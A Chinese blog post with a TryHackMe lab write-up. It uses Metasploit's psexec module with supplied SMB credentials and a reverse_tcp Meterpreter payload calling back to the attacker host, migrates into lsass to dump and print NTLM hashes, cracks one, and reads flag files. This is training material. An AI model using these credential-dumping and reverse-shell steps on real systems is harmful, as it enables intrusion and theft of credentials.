TryHackMe-渗透测试11_log

已于 2023-01-15 14:25:25 修改
阅读量398 收藏
点赞数 1
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: 网络安全 安全 web安全
于 2022-12-22 10:32:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128402384
版权

Matesploit 漏洞利用后 挑战

以下问题将帮助您更好地了解如何在开发后使用 Meterpreter。

您可以使用以下凭据来模拟通过 SMB(服务器消息块)的初始入侵(使用 exploit/windows/smb/psexec)

Username: ballen

Password: Password1

< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

msf6 > nmap -sS 10.10.214.4
[*] exec: nmap -sS 10.10.214.4

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 19:30 CST
Nmap scan report for 10.10.214.4 (10.10.214.4)
Host is up (0.23s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

msf6 > use exploit/windows/smb/psexec 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/smb/psexec) > set rhosts 10.10.214.4
rhosts => 10.10.214.4
msf6 exploit(windows/smb/psexec) > set lhost 10.14.39.48
lhost => 10.14.39.48

msf6 exploit(windows/smb/psexec) > set smbuser ballen
smbuser => ballen
msf6 exploit(windows/smb/psexec) > set smbpass Password1
smbpass => Password1
msf6 exploit(windows/smb/psexec) > run

meterpreter> getuid ,发现是:

Server username: NT AUTHORITY\SYSTEM
1.计算机名称是什么?
meterpreter > sysinfo
Computer        : ACME-TEST
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : FLASH
Logged On Users : 8
Meterpreter     : x86/windows

ACME-TEST

2.目标域是什么?
从上一问处得知,FLASH
3.用户可能创建的共享的名称是什么?
msf6 post(windows/gather/enum_shares) > run

[*] Running module against ACME-TEST (10.10.214.4)
[*] The following shares were found:
[*] 	Name: SYSVOL
[*] 	Path: C:\Windows\SYSVOL\sysvol
[*] 	Remark: Logon server share 
[*] 	Type: DISK
[*] 
[*] 	Name: NETLOGON
[*] 	Path: C:\Windows\SYSVOL\sysvol\FLASH.local\SCRIPTS
[*] 	Remark: Logon server share 
[*] 	Type: DISK
[*] 
[*] 	Name: speedster
[*] 	Path: C:\Shares\speedster
[*] 	Type: DISK
[*] 
[*] Post module execution completed

前两个Remark: Logon server share,故第三个 speedster

4.jchambers 用户的 NTLM 哈希是什么?

直接hashdump 无权访问。

在内网渗透进行横向移动和权限提升时,最常用的方法是通过dump进程lsass.exe,
从中获得明文口令或者hash。lsass.exe(Local Security Authority Subsystem Service)是一个系统进程,
用于微软Windows系统的安全机制,它用于本地安全和登陆策略。在进程空间中,
存有着机器的域、本地用户名和密码等重要信息。但是需要首先获得一个高的权限才能对其进行访问。

ps查看进程表,迁移至lsass进程:

meterpreter > migrate 764
[*] Migrating from 2868 to 764...
[*] Migration completed successfully.

此时再输入hashdump:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:ade6f690c69ea738af21a4dc2df4adf7:::

69596c7aa1e8daee17f8e78870e25a5c

5.jchambers用户的明文密码是什么?

随便找个撞库在线网站,得到:Trustno1

6.“秘密.txt”文件位于何处?
meterpreter > search -f secrets.txt
Found 1 result...
=================

Path                                                            Size (bytes)  Modified (UTC)
----                                                            ------------  --------------
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt  35            2021-07-30 15:44:27 +0800

C:\Program Files (x86)\Windows Multimedia Platform\

7.“秘密.txt”文件中透露的推特密码是什么?
meterpreter > shell
Process 3552 created.
Channel 1 created.

C:\Windows\system32>type C:\Program Files (x86)\Windows Multimedia Platform\secrets.txt

My Twitter password is KDSvbsw3849!

8.“realsecret.txt”文件在哪里?
c:\Program Files (x86)\Windows Multimedia Platform>exit
exit
meterpreter > search -f realsecret.txt
Found 1 result...
=================

Path                               Size (bytes)  Modified (UTC)
----                               ------------  --------------
c:\inetpub\wwwroot\realsecret.txt  34            2021-07-30 16:30:24 +0800

c:\inetpub\wwwroot\

9.真正的秘密是什么?
c:\Program Files (x86)\Windows Multimedia Platform>exit
exit
meterpreter > search -f realsecret.txt
Found 1 result...
=================

Path                               Size (bytes)  Modified (UTC)
----                               ------------  --------------
c:\inetpub\wwwroot\realsecret.txt  34            2021-07-30 16:30:24 +0800

meterpreter > cat c:\inetpub\wwwroot\realsecret.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the file specified.
meterpreter > cat c:\\inetpub\\wwwroot\\realsecret.txt
The Flash is the fastest man alive

The Flash is the fastest man alive

Sugobet
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
turbocodermax-log.rar_LOG-MAP译码_Max Log MAP _Max-Log-Map_log map
07-14
简化MAX-LOG-MAP算法与LOG-MAP算法性能对比 MAX-LOG-MAP_1024_标准交织_1~3次迭代_grid 简化MAX-LOG-MAP算法与门限MAX-LOG-MAP算法性能对比_10次迭代640交织长度
ATT&CK红队评估实战靶场-1(全网最细)
lwwzyy
12-20 3541
声明:该系列文章首发于公众号:纁玄安全,转载请注明出处!本公众号所分享内容仅用于网安爱好者之间的技术讨论,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本公众号及作者不承担相应的后果。 ATT&CK红队评估实战靶场-1 目录: 1. 环境配置 插播一点网络配置的姿势 2. 实战 2.1 信息收集 2.2 web站点探测 2.3 getshell 3 漏洞 3.1 目录遍历漏洞 3.2 存储型XSS 4. ..
Metasploit:一颗没有发现的珍珠
09-17 191
本文介绍一下在Metasploit中被很少人了解的一项功能—Meterpreter执行命令过程中的—m参数。在说明文档中,仅仅介绍了这个参数能够在“内存中执行”,其实没有真正解释它的价值。下面是使用这个参数的一个演示: meterpreter > cd %systemroot% meterpreter > cd system32 meterpreter ...
Error response from daemon: open \\.\pipe\docker_engine_linux: The system cannot find the file speci
czjnoe的博客
12-27 4788
环境: window10 docker docker报错: Error response from daemon: open \\.\pipe\docker_engine_linux: The system cannot find the file specified. 解决: 1、Net stop com.docker.service 2、Net start com.docker.service
打微软补丁的一份代码
04-07 1639
;; CRclean.asm; by Markus Kern ; 06.08.2001;; downloads CRclean.dll from sender and executes it using rundll32.exe; then calls ExitProcess() on success or sleeps forever on failure;.
Hadoop-0.20.0源代码分析(07)
千与的专栏
09-22 5400
前面分析了与操作系统有关的Shell命令,它们用于与操作系统进行命令行方式的交互。在Hadoop中,自定义了FileSystem文件系统,这是基于Unix操作系统之上的文件系统,为了方便对FileSystem的管理,通过org.apache.hadoop.fs.FsShell类定义了对Hadoop FileSystem文件系统进行命令行方式管理的命令实现。先给出对Hadoop文件系统进行管理的
TryHackMe-进攻性渗透测试-11_破坏活动目录
M1n9K1n9的博客
12-24 336
访问第一组 AD 凭据的两种常用方法是开源情报 (OSINT) 和网络钓鱼。我们在这里只简要提及这两种方法,因为它们已经在其他房间中进行了更深入的介绍。OSINT 用于发现已公开披露的信息。就 AD 凭据而言,发生这种情况可能有多种原因,例如:在公共论坛(如 Stack Overflow)上提问但在问题中披露敏感信息(例如其凭据)的用户。使用硬编码凭据将脚本上传到 Github 等服务的开发人员。由于员工使用其工作帐户注册其他外部网站,因此在过去违规行为中披露的凭据。
CAPTCHA验证码无法加载/验证失败(UDebug)解决办法
ZX_Infinite的博客
06-17 7565
一些网站要机器验证但没有加载出验证按钮,如: UDebug…
无法验证开发者_有些网站注册时一直提示reCAPTCHA验证失败是怎么回事?
热门推荐
weixin_39709979的博客
11-29 5万+
我们在访问一些国外的网站时,在注册或者下载文件资料的时候经常会遇到无法加载reCAPTCHA人机验证的情况,很多时候这个reCAPTCHA人机验证的内容根本就不会显示,导致我们账号注册失败了还一脸懵逼,不知道发生了什么。图1:无法加载reCAPTCHA人机验证的问题这是因为reCAPTCHA是谷歌的验证码服务,一些国外网站很喜欢用这个人机认证的功能。而我们知道,在中国大陆是无法访问谷歌的,谷歌的r...
内网渗透之内网信息收集(综合)
墨鱼菜鸡
09-10 478
目录 Metasploit内网信息收集 01msf反弹shell 02msf反弹shell 03通过shell关闭防火墙 04关闭杀毒软件 05打开并连接3389 06数据包抓取 07口令破解 普通用户提权 08other 09scraper 09winenum 10msf主机发现 11msf端口扫描 12服务扫描与查点 ...
浅谈MS17-010永恒之蓝漏洞利用(渗透,后渗透)2
m0_70383208的博客
05-28 469
接着上面的成功渗透的结果,我们可以看到一个meterpreter,我们可以输入命令查看当前用户信息 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 接着我们需要使用一个后渗透模块kiwi-后渗透阶段的一款利器. 输入load kiwi //加载kiwi,如下图 接下来我们需要进行进程迁移,先使用ps 查看当前进程 将 SYSTEM 权限 迁移为 Administrator meterpreter > ps
2021-04-09_bookNotice_log.txt
06-01
2021-04-09_bookNotice_log.txt
max-log-map.zip_Log-MAP_Max_Log_MAP_log map_log map C语言_log_MAX
09-23
max-log-map算法的C语言的实现,能计算出所需要的LLR,做出软判决和硬判决。
LOG-SK-3_log_excel_
09-28
sample log traditional sondage
log-transfer.zip_Log image
09-20
logaritmic transfer of an image
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8174
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
人工智能安全与光明时代
qq18218628646的博客
04-19 827
模式许可和监督可能会适得其反,因为以不可持续的方式集中权力
小程序前端调用接口(getAccessToken)获取调用凭据,调用接口(msgSecCheck)检测文本内容是否安全--最终版
最新发布
qq_39951524的博客
04-22 536
小程序前端调用接口(getAccessToken)获取调用凭据,调用接口(msgSecCheck)检测文本你在前端测试时,最好使用**小程序工具的真机调试**,是可以跑通的,但你用**小程序工具的真机预览模式**就会没有响应。原因就在于访问**wx.request({})**,中的**服务器网址** ,需要在**小程序开发管理** 》》**开发设置** 》》 **服务器域名** 中配置,而小程序提供的接口**https://api.weixin.qq.com** ,又恰恰**不允许**在服务器域名中配置,
20232831袁思承2023-2024-2 《网络攻防实践》第6次作业
qq_53198713的博客
04-19 798
网络攻防~
usage: ipykernel_launcher.py [-h] [--lr LR] [--train_db_path TRAIN_DB_PATH] [--test_db_path TEST_DB_PATH] [--dataset DATASET] [--wm_path WM_PATH] [--wm_lbl WM_LBL] [--batch_size BATCH_SIZE] [--wm_batch_size WM_BATCH_SIZE] [--max_epochs MAX_EPOCHS] [--lradj LRADJ] [--save_dir SAVE_DIR] [--save_model SAVE_MODEL] [--load_path LOAD_PATH] [--resume] [--wmtrain] [--log_dir LOG_DIR] [--runname RUNNAME]
05-17
- `--test_db_path`: 测试数据集的路径。 - `--dataset`: 数据集的名称。 - `--wm_path`: 水印图像数据集的路径。 - `--wm_lbl`: 水印图像的标签。 - `--batch_size`: 训练批次的大小。 - `--wm_batch_size`: 水印...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值